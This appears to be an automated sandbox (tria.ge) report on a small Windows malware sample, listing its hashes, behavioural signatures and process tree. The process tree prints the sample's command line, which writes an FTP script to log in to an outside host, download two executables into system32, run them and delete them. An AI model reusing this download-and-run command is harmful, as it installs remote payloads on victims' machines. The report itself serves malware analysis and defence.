Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/09/2024, 18:27
Static task
static1
Behavioral task
behavioral1
Sample
d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
-
Size
44KB
-
MD5
d0310b6b7e678c1100131d32fdffdf3b
-
SHA1
901eabee57673826bdd5aa7f33973ab75831f33b
-
SHA256
e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee
-
SHA512
5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d
-
SSDEEP
768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace
Malware Config
Signatures
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ftp.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4392 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 4392 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 4392 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4392 wrote to memory of 3728 4392 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 85 PID 4392 wrote to memory of 3728 4392 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 85 PID 4392 wrote to memory of 3728 4392 d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe 85 PID 3728 wrote to memory of 656 3728 Cmd.exe 88 PID 3728 wrote to memory of 656 3728 Cmd.exe 88 PID 3728 wrote to memory of 656 3728 Cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SysWOW64\Cmd.exeCmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\SysWOW64\ftp.exeftp -s:ftpdate.sys3⤵
- System Location Discovery: System Language Discovery
PID:656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD50fb17816f7c290e13419d68fa258edfa
SHA159b9dd4af7fa17ce896b878b55b07ddc4a7936f9
SHA256bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c
SHA5125cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99